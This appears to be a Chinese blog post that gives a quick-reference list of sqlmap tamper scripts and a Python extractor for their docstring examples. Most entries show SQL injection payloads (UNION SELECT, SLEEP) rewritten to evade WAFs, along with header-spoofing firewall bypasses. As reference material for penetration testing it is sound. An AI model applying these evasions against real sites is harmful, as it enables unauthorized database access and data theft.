sqlmap tamper规则速查

Sqlmap Tamper规则提取:

写了个小脚本从 sqlmap 的 tamper 目录下的各个脚本文件里把替换规则(即 docstring 中的 `>>> tamper(...)` 示例及其输出)提取出来,方便查阅。脚本扫描的是它自身所在的目录,因此需要把它放到 sqlmap 的 tamper/ 目录下运行。

0x2char.py:

Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart
>>> tamper('SELECT 0xdeadbeef')
    'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'

apostrophemask.py:

Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)
>>> tamper("1 AND '1'='1")
    '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

apostrophenullencode.py:

Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)
>>> tamper("1 AND '1'='1")
    '1 AND %00%271%00%27=%00%271'

appendnullbyte.py:

Appends (Access) NULL byte character (%00) at the end of payload
>>> tamper('1 AND 1=1')
    '1 AND 1=1%00'

base64encode.py:

Base64-encodes all characters in a given payload
>>> tamper("1' AND SLEEP(5)#")
    'MScgQU5EIFNMRUVQKDUpIw=='

between.py:

Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
>>> tamper('1 AND A > B--')
    '1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
    '1 AND A BETWEEN B AND B--'

bluecoat.py:

Replaces the space character after each SQL keyword with a valid random blank character. Afterwards replaces the '=' character with the LIKE operator
>>> tamper('SELECT id FROM users WHERE id = 1')
    'SELECT%09id FROM%09users WHERE%09id LIKE 1'

chardoubleencode.py:

Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)
>>> tamper('SELECT FIELD FROM%20TABLE')
    '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

charencode.py:

URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
>>> tamper('SELECT FIELD FROM%20TABLE')
    '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

charunicodeencode.py:

Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
>>> tamper('SELECT FIELD%20FROM TABLE')
    '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

charunicodeescape.py:

Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
>>> tamper('SELECT FIELD FROM TABLE')
    '\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045'

commalesslimit.py:

Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
>>> tamper('LIMIT 2, 3')
    'LIMIT 3 OFFSET 2'

commalessmid.py:

Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart
>>> tamper('MID(VERSION(), 1, 1)')
    'MID(VERSION() FROM 1 FOR 1)'

commentbeforeparentheses.py:

Prepends (inline) comment before parentheses (e.g. ( -> /**/()
>>> tamper('SELECT ABS(1)')
    'SELECT ABS/**/(1)'

concat2concatws.py:

Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
>>> tamper('CONCAT(1,2)')
    'CONCAT_WS(MID(CHAR(0),0,0),1,2)'

equaltolike.py:

Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
>>> tamper('SELECT * FROM users WHERE id=1')
    'SELECT * FROM users WHERE id LIKE 1'

escapequotes.py:

Slash escape single and double quotes (e.g. ' -> \')
>>> tamper('1" AND SLEEP(5)#')
    '1\\\\" AND SLEEP(5)#'

greatest.py:

Replaces greater than operator ('>') with 'GREATEST' counterpart
>>> tamper('1 AND A > B')
    '1 AND GREATEST(A,B+1)=A'

halfversionedmorekeywords.py:

Adds (MySQL) versioned comment before each keyword
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
    "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

htmlencode.py:

HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> &#39;)
>>> tamper("1' AND SLEEP(5)#")
    '1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'

ifnull2casewhenisnull.py:

Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart
>>> tamper('IFNULL(1, 2)')
    'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END'

ifnull2ifisnull.py:

Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart
>>> tamper('IFNULL(1, 2)')
    'IF(ISNULL(1),2,1)'

informationschemacomment.py:

Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
>>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
    'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'

least.py:

Replaces greater than operator ('>') with 'LEAST' counterpart
>>> tamper('1 AND A > B')
    '1 AND LEAST(A,B+1)=B+1'

lowercase.py:

Replaces each keyword character with lower case value (e.g. SELECT -> select)
>>> tamper('INSERT')
    'insert'

luanginx.py:

LUA-Nginx WAFs Bypass (e.g. Cloudflare)
>>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload)
    '0U=&Aq=&Fz=&Ws=&DK=&4F=&rU=&Mp=&48=&Y3=&tT=&3Q=&Dg=&AL=&47=&D1=&qX=&Ia=&Sy=&ZP=&aE=&1p=&u1=&lJ=&o7=&XB=&et=&F5=&gI=&RH=&YH=&7L=&KB=&Kx=&Js=&lL=&OD=&fU=&25=&03=&5H=&yR=&rY=&03=&K6=&JB=&O9=&4X=&fL=&EN=&0p=&Th=&nX=&uY=&gj=&Rc=&J4=&HQ=&bN=&LJ=&yw=&8c=&b7=&lh=&nX=&6b=&Ag=&qn=&Ov=&lF=&cg=&9m=&wT=&Z4=&kP=&7d=&P0=&vp=&LB=&kD=&zJ=&Ft=&wZ=&pI=&aT=&uc=&ro=&7v=&rw=&6N=&MS=&yz=&Oa=&lu=&oN=&x2=&Jz=&yR=&zP=&cB=&qj=&GE=&IU=&2E=&tC=&Y2=&Yl=&9N=&fS=&9y=&Qt=&nS=&aZ=&Gg=&hO=&2r=&8g=&0y=&fr=&CX=&1i=&GO=&v2=&rb=&cQ=&I6=&64=&cU=&RO=&S3=&Nx=&Hm=&Ka=&ju=&WS=&uM=&ck=&8r=&yI=&sD=&oc=&lG=&ey=&uz=&g4=&D0=&8v=&DR=&As=&T3=&5M=&x8=&Ne=&fU=&da=&yG=&BE=&KQ=&Aw=&9q=&WA=&wd=&1R=&3B=&Ph=&ym=&c6=&nj=&mx=&Hj=&98=&jz=&Q2=&E4=&tE=&EP=&mL=&nv=&73=&Yc=&jp=&W0=&KS=&Ye=&f1=&cn=&ca=&0u=&jO=&8F=&3F=&JQ=&XU=&9U=&4m=&HL=&ZD=&Xy=&K0=&XO=&al=&Fp=&e1=&6s=&zY=&dN=&hr=&Zd=&cz=&E1=&SP=&j9=&zL=&xc=&Dj=&cM=&Ng=&Iv=&xW=&E2=&LC=&Nu=&hQ=&MW=&h4=&X4=&2Q=&YG=&Wl=&WB=&UC=&We=&c5=&E3=&6P=&Jn=&fY=&3W=&RA=&sh=&AJ=&56=&zg=&VT=&bB=&Qb=&47=&Se=&ew=&bv=&a8=&Ye=&3m=&mP=&6h=&aw=&bL=&1l=&gv=&7i=&7w=&Ds=&67=&Nl=&9g=&Kj=&36=&Xt=&pU=&sA=&ci=&be=&eA=&IT=&iA=&Nf=&Bw=&6d=&zT=&tm=&sD=&6X=&rI=&QX=&By=&VA=&pC=&6i=&CN=&Dm=&aR=&Ma=&sV=&MH=&jR=&DQ=&Vo=&Vr=&9h=&2c=&pG=&Ky=&gp=&rU=&4K=&cX=&sv=&Gp=&5k=&zr=&GJ=&MG=&zN=&zW=&Ws=&xM=&jR=&xK=&iP=&vD=&zD=&Rt=&Od=&sU=&dM=&bD=&3a=&Ge=&1Q=&UP=&ac=&M9=&2R=&To=&Ur=&gC=&uk=&A3=&AB=&RG=&i4=&BW=&yY=&yn=&m6=&Kd=&yo=&fl=&dN=&kL=&LR=&Fr=&2v=&CN=&F7=&75=&5K=&ER=&nq=&ck=&aO=&iW=&Q8=&y5=&Cv=&g2=&Xu=&Cu=&bc=&wm=&Gl=&mP=&Tt=&1p=&vS=&c5=&eC=&Sc=&Y8=&Ch=&fg=&Vz=&4B=&eA=&UZ=&cl=&Eh=&25=&tA=&Ir=&Hm=&sB=&LH=&qo=&hW=&gT=&pr=&TO=&TF=&1h=&Oh=&Tw=&PR=&On=&Zo=&GP=&oM=&rk=&YI=&uK=&bi=&y8=&Fe=&VW=&WJ=&Rn=&TY=&Vv=&KM=&3g=&ZG=&wC=&an=&OE=&7D=&t0=&qL=&RY=&Wx=&dc=&T7=&vB=&SO=&qP=&sw=&HT=&jb=&Mb=&cn=&Oe=&d8=&A3=&nA=&wk=&u9=&Ux=&zq=&GT=&QC=&c5=&zy=&ai=&1F=&Tj=&u0=&Yp=&bY=&kW=&Qk=&e5=&LM=&Cj=&Lp=&XT=&b5=&cf=&sj=&ow=&Tz=&qE=&yt=&3I=&8V=&Jq=&QC=&Sz=&Eb=&Tc=&QK=&Wr=&Qm=&Gv=&8m=&Ju=&85=&KS=&Qv=&43=&uU=&aY=&J7=&wM=&uW=&L9=&ai=&ch=&56=&D6=&YW=
&Ul=&1 AND 2>1'

modsecurityversioned.py:

Embraces complete query with (MySQL) versioned comment
>>> import random
    >>> random.seed(0)
>>> tamper('1 AND 2>1--')
    '1 /*!30874AND 2>1*/--'

modsecurityzeroversioned.py:

Embraces complete query with (MySQL) zero-versioned comment
>>> tamper('1 AND 2>1--')
    '1 /*!00000AND 2>1*/--'

multiplespaces.py:

Adds multiple spaces (' ') around SQL keywords
>>> random.seed(0)
    >>> tamper('1 UNION SELECT foobar')

overlongutf8.py:

Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
    'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'

overlongutf8more.py:

Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
    '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'

percentage.py:

Adds a percentage sign ('%') in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
>>> tamper('SELECT FIELD FROM TABLE')
    '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'

plus2concat.py:

Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
    'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'

>>> tamper('SELECT (CHAR(113)+CHAR(114)+CHAR(115)) FROM DUAL')
    'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'

plus2fnconcat.py:

Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
    'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'
>>> tamper('SELECT (CHAR(113)+CHAR(114)+CHAR(115)) FROM DUAL')
    'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'

randomcase.py:

Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
    'INseRt'

randomcomments.py:

Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT)
>>> import random
    >>> random.seed(0)
>>> tamper('INSERT')
    'I/**/N/**/SERT'

space2comment.py:

Replaces space character (' ') with comments '/**/'
>>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'

space2dash.py:

Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
>>> random.seed(0)
    >>> tamper('1 AND 9227=9227')

space2hash.py:

Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
>>> random.seed(0)
    >>> tamper('1 AND 9227=9227')

space2morecomment.py:

Replaces (MySQL) instances of space character (' ') with comments '/**_**/'
>>> tamper('SELECT id FROM users')
    'SELECT/**_**/id/**_**/FROM/**_**/users'

space2morehash.py:

Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
>>> random.seed(0)
    >>> tamper('1 AND 9227=9227')

space2mssqlblank.py:

Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
>>> random.seed(0)
    >>> tamper('SELECT id FROM users')

space2mssqlhash.py:

Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
>>> tamper('1 AND 9227=9227')
    '1%23%0AAND%23%0A9227=9227'

space2mysqlblank.py:

Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
>>> random.seed(0)
    >>> tamper('SELECT id FROM users')

space2mysqldash.py:

Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
>>> tamper('1 AND 9227=9227')
    '1--%0AAND--%0A9227=9227'

space2plus.py:

Replaces space character (' ') with plus ('+')
>>> tamper('SELECT id FROM users')
    'SELECT+id+FROM+users'

space2randomblank.py:

Replaces space character (' ') with a random blank character from a valid set of alternate characters
>>> random.seed(0)
    >>> tamper('SELECT id FROM users')

sp_password.py:

Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
>>> tamper('1 AND 9227=9227-- ')
    '1 AND 9227=9227-- sp_password'

symboliclogical.py:

Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
>>> tamper("1 AND '1'='1")
    "1 %26%26 '1'='1"

unionalltounion.py:

Replaces instances of UNION ALL SELECT with UNION SELECT counterpart
>>> tamper('-1 UNION ALL SELECT')
    '-1 UNION SELECT'

unmagicquotes.py:

Replaces quote character (') with a multi-byte combo %BF%27 together with a generic comment at the end (to make it work). The %BF byte is meant to absorb the backslash that magic_quotes/addslashes inserts before the quote, so this only works when the backend connection uses a multi-byte charset such as GBK
>>> tamper("1' AND 1=1")
    '1%bf%27-- -'

uppercase.py:

Replaces each keyword character with upper case value (e.g. select -> SELECT)
>>> tamper('insert')
    'INSERT'

varnish.py:

Appends an HTTP header 'X-originating-IP' to bypass Varnish Firewall
Examples:
>> X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
>> X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
>> X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
>> x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
>> X-remote-IP: * or %00 or %0A

versionedkeywords.py:

Encloses each non-function keyword with (MySQL) versioned comment
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
    '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'

versionedmorekeywords.py:

Encloses each keyword with (MySQL) versioned comment
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
    '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'

xforwardedfor.py:

Append a fake HTTP header 'X-Forwarded-For'
headers = kwargs.get("headers", {})
headers["X-Forwarded-For"] = randomIP()
headers["X-Client-Ip"] = randomIP()
headers["X-Real-Ip"] = randomIP()

脚本代码:



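import re
import os
import sys

# One doctest example: the ">>> tamper(...)" call line plus its expected-output line.
tamper_Regex = re.compile(r'>>>.+\s.+\s')
# A docstring opener followed by its first text line; the 2nd hit in a tamper
# file is the tamper() description (the 1st is the license header docstring).
tamper_info_Regex = re.compile(r'"""\s.+')

# Files in sqlmap's tamper/ directory that carry no extractable rule
# (the base module and the header-injecting tampers that have no doctest).
SKIP_FILES = frozenset({"tamper.py", "varnish.py", "xforwardedfor.py", "__init__.py"})


def extract_rules(tamper_raw: str) -> "tuple[str | None, list[str]]":
    """Pull the description and doctest examples out of one tamper script's source.

    Args:
        tamper_raw: full text of a sqlmap tamper .py file.

    Returns:
        (description, rules): description is the text following the second
        docstring opener with the triple quotes stripped (None when the file
        has fewer than two matching docstrings); rules holds at most the first
        two '>>> tamper(...)' examples, each with its result line and trailing
        newline exactly as matched by tamper_Regex.
    """
    info = tamper_info_Regex.findall(tamper_raw)
    rules = tamper_Regex.findall(tamper_raw)
    # Guard the index: a file without the expected docstrings used to raise IndexError.
    description = info[1].replace('"""', '') if len(info) > 1 else None
    return description, rules[:2]


def main() -> None:
    """Print a markdown cheat sheet for every tamper script next to this file.

    The script is expected to live inside sqlmap's tamper/ directory: it scans
    the directory it was started from (sys.path[0]), as the original did.
    """
    print("Sqlmap Tamper规则提取:\n")
    # sys.path[0] is the script's directory when run as a script; fall back to
    # the cwd for the interactive / -c cases where it is empty.
    os.chdir(sys.path[0] or os.getcwd())
    path = os.getcwd()
    print(path)
    # Do not try to parse this extractor itself.
    self_name = os.path.basename(sys.argv[0])

    # Sorted for a stable cheat sheet; os.listdir order is filesystem-dependent.
    for tamper_name in sorted(os.listdir(path)):
        # Skip helpers, ourselves and anything that is not a Python source
        # (e.g. the __pycache__ directory, which open() would choke on).
        if tamper_name in SKIP_FILES or tamper_name == self_name or not tamper_name.endswith(".py"):
            continue
        file = os.path.join(path, tamper_name)  # portable; the old "\\" join was Windows-only
        # Context manager closes the handle; the original `fo.close` (no parentheses) never did.
        with open(file, "r", encoding="utf-8") as fo:
            tamper_raw = fo.read()
        description, rules = extract_rules(tamper_raw)
        print("### " + tamper_name + ':')
        print(description if description is not None else "(no description docstring found)")
        print("```")
        for rule in rules:
            print(rule)
        print("```")


if __name__ == "__main__":
    main()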
